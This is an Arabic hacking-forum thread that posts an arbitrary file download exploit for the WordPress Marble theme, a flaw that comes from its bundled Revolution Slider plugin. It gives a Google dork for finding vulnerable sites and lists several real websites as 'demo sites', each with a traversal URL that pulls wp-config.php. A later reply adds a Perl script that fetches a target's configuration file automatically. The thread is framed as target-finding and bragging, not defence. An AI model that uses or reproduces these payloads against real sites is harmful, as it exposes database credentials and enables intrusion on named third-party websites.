TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 17-09-2014, 09:27 PM
الصورة الرمزية NULL Pointer
NULL Pointer
عضو مميز
 
حـالة التــواجـد : NULL Pointer غير متواجد حالياً
تاريخ التسجيل: Jun 2014
الجــــنــــــس: ذكـر
المشاركات: 258
شكراً:254
تم شكره 1,511 مرة في 211 مشاركة
معدل تقييم المستوى: 0
NULL Pointer بدون تقييم
افتراضي WordPress Theme Marble Arbitrary File Download Vulnerability

ثغرة LFD بسيطة اكتشفتها اليوم

كود:
Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability

Exploit Author : NULL_Pointer

Date : 17/09/2014

Vendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650

Version: 1.1.2

Google Dork : inurl:"/wp-content/themes/marble/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme Marble suffers from Arbitrary File Download Vulnerability.

Exploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
هههه الأيام هذي نشبعكم ثغرات
 

 

 

رد مع اقتباس
12 أعضاء قالوا شكراً لـ NULL Pointer على المشاركة المفيدة:
  #2  
قديم 17-09-2014, 09:53 PM
الصورة الرمزية hamza parola
hamza parola
عضو مميز
 
حـالة التــواجـد : hamza parola غير متواجد حالياً
تاريخ التسجيل: Jan 2014
مكـان الإقامـة : Morocco
الجــــنــــــس: ذكـر
المشاركات: 580
شكراً:321
تم شكره 1,133 مرة في 285 مشاركة
معدل تقييم المستوى: 0
hamza parola لديه سلوك وقح قليلا في الماضي
افتراضي رد: WordPress Theme Marble Arbitrary File Download Vulnerability

اكتشفتها اليوم ؟

شوف السكربت الخاص بك نتاع فحص lfd راك تلقاها  

 

 

العبادة كثرو في الدومين
غير لتعلم جوج كلمات حس براصو وصل
الهربة و شكرا

http://im49.gulfup.com/o4fk9Z.jpg
فريق حلمي انونيموس

Made In Morocco
رد مع اقتباس
  #3  
قديم 17-09-2014, 10:02 PM
الصورة الرمزية NULL Pointer
NULL Pointer
عضو مميز
 
حـالة التــواجـد : NULL Pointer غير متواجد حالياً
تاريخ التسجيل: Jun 2014
الجــــنــــــس: ذكـر
المشاركات: 258
شكراً:254
تم شكره 1,511 مرة في 211 مشاركة
معدل تقييم المستوى: 0
NULL Pointer بدون تقييم
افتراضي رد: WordPress Theme Marble Arbitrary File Download Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة hamza parola مشاهدة المشاركة

اكتشفتها اليوم ؟

شوف السكربت الخاص بك نتاع فحص lfd راك تلقاها

o.O


 

 

 

رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ NULL Pointer على المشاركة المفيدة:
  #4  
قديم 17-09-2014, 10:05 PM
الصورة الرمزية hamza parola
hamza parola
عضو مميز
 
حـالة التــواجـد : hamza parola غير متواجد حالياً
تاريخ التسجيل: Jan 2014
مكـان الإقامـة : Morocco
الجــــنــــــس: ذكـر
المشاركات: 580
شكراً:321
تم شكره 1,133 مرة في 285 مشاركة
معدل تقييم المستوى: 0
hamza parola لديه سلوك وقح قليلا في الماضي
Talking رد: WordPress Theme Marble Arbitrary File Download Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة NULL Pointer مشاهدة المشاركة




o.O


قصدي الاستغلال :

كود بلغة HTML:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
هي تعتبر ثغرة في

WordPress Slider Revolution Responsive  

 

 

العبادة كثرو في الدومين
غير لتعلم جوج كلمات حس براصو وصل
الهربة و شكرا

http://im49.gulfup.com/o4fk9Z.jpg
فريق حلمي انونيموس

Made In Morocco
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ hamza parola على المشاركة المفيدة:
  #5  
قديم 17-09-2014, 10:08 PM
الصورة الرمزية NULL Pointer
NULL Pointer
عضو مميز
 
حـالة التــواجـد : NULL Pointer غير متواجد حالياً
تاريخ التسجيل: Jun 2014
الجــــنــــــس: ذكـر
المشاركات: 258
شكراً:254
تم شكره 1,511 مرة في 211 مشاركة
معدل تقييم المستوى: 0
NULL Pointer بدون تقييم
افتراضي رد: WordPress Theme Marble Arbitrary File Download Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة hamza parola مشاهدة المشاركة

قصدي الاستغلال :

كود بلغة HTML:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
هي تعتبر ثغرة في

WordPress Slider Revolution Responsive
نعم عارف الثغرة أساسا موجودة في البلوجين revslider وبعض الثيمات مركبة هذا البلوجين كموديل معها (مثل marble وغيره...).

فلذلك الإستغلال واحد.
 

 

 

رد مع اقتباس
2 أعضاء قالوا شكراً لـ NULL Pointer على المشاركة المفيدة:
  #6  
قديم 17-09-2014, 10:33 PM
الصورة الرمزية Mr_AnarShi-T
Mr_AnarShi-T
عضو مميز
 
حـالة التــواجـد : Mr_AnarShi-T غير متواجد حالياً
تاريخ التسجيل: Jul 2011
الجــــنــــــس: ذكـر
المشاركات: 260
شكراً:246
تم شكره 717 مرة في 170 مشاركة
معدل تقييم المستوى: 9
Mr_AnarShi-T على طريق التميز
افتراضي رد: WordPress Theme Marble Arbitrary File Download Vulnerability

هذه هي مشكلة الوردبريس و غباء المرمجين فيها لو تلاحظ ثغرات الأبلود
3 أنواع uploadify & themify & orange_theme موجودة في أغلبية التيمات القديمة
و الإستغلال نفسو لكل نوع
كذلك علي مستوي ثغرات LFD هالمدة و غيرها
بس يكون التغيير علي مستوي المسارات و الملفات المصابة
إكتشاف رائع أخي null واصل
تحياتي في أمان الله ~  

 

 

Perl & Java Lov3r

No perl No life
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Mr_AnarShi-T على المشاركة المفيدة:
  #7  
قديم 13-03-2015, 02:13 PM
الصورة الرمزية miutex
miutex
عضو مميز
 
حـالة التــواجـد : miutex غير متواجد حالياً
تاريخ التسجيل: Jun 2013
الجــــنــــــس: ذكـر
المشاركات: 102
شكراً:87
تم شكره 271 مرة في 63 مشاركة
معدل تقييم المستوى: 0
miutex بدون تقييم
افتراضي رد: WordPress Theme Marble Arbitrary File Download Vulnerability

إستغلال بسيط عن طريق الPerl

كود:
#!/usr/bin/perl

use LWP::Simple;

print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "#                   Marble WP Theme File Download Vulnerability        #\n";
print "#                   Exploit Author: NULL Pointer                       #\n";
print "#                   Coder: TUNISIAN CYBER  (miutex)                    #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";

$target = $ARGV[0];
my $status = getstore($target . "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php", "config.txt");
 
if ( is_success($status) )
{
  print "Config Downloaded!\n";
}
else
{
  print "Error!: $status\n";
}
 

 

 

" يَرْفَعِ اللَّهُ الَّذِينَ آمَنُوا مِنكُمْ وَالَّذِينَ أُوتُوا الْعِلْمَ دَرَجَاتٍ وَاللَّهُ بِمَا تَعْمَلُونَ خَبِيرٌ"
سورة المجادلة
رد مع اقتباس

الكلمات الدلالية (Tags)
arbitrary, download, faille, file, marble, secure, security vulnerabilities, theme, vulnerability, wordpress


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
#1337day Wordpress Infocus3 Theme Arbitrary File Download Vulnerability [webapps #exp inj3ct0r قسم جديد ثغرات مواقع الحماية 0 09-01-2015 12:22 PM
#1337day Wordpress Infocus2 Theme Arbitrary File Download Vulnerability [webapps #exp inj3ct0r قسم جديد ثغرات مواقع الحماية 0 09-01-2015 12:22 PM
WordPress Theme Konzept Arbitrary File Upload Vulnerability NULL Pointer قسم جديد ثغرات الأعضاء 3 19-09-2014 07:55 AM
[web applications] - Wordpress Persuasion Theme - Arbitrary File Download and File De inj3ct0r قسم جديد ثغرات مواقع الحماية 0 09-01-2014 09:37 AM


الساعة الآن 03:07 AM